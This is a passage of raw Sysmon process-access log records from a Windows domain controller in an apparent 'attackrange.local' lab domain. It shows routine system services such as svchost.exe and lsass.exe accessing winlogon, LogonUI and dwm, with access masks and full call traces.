ystem32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009669Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.779{08A6967A-4288-6000-1000-000000009A01}11361996C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50d64|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009668Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.779{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+2de4|c:\windows\system32\lsm.dll+57af|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009667Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.779{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2dce|c:\windows\system32\lsm.dll+57af|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009666Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.779{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+5f9d|c:\windows\system32\lsm.dll+57a4|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009665Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.764{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009664Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.764{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009663Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.764{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009662Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.764{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+2f9b|c:\windows\system32\lsm.dll+5727|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009661Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.764{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2f4d|c:\windows\system32\lsm.dll+5727|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009660Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.764{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+5f9d|c:\windows\system32\lsm.dll+5718|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009659Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.764{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+56c4|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009658Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.764{08A6967A-4288-6000-1500-000000009A01}13241972C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009657Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.717{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009656Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.717{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009655Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.717{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009654Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.701{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009653Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.701{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0605-000000009A01}4632C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009652Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.701{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0605-000000009A01}4632C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009651Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.576{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009650Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.576{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009649Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.576{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009648Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.576{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009647Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.576{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009646Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 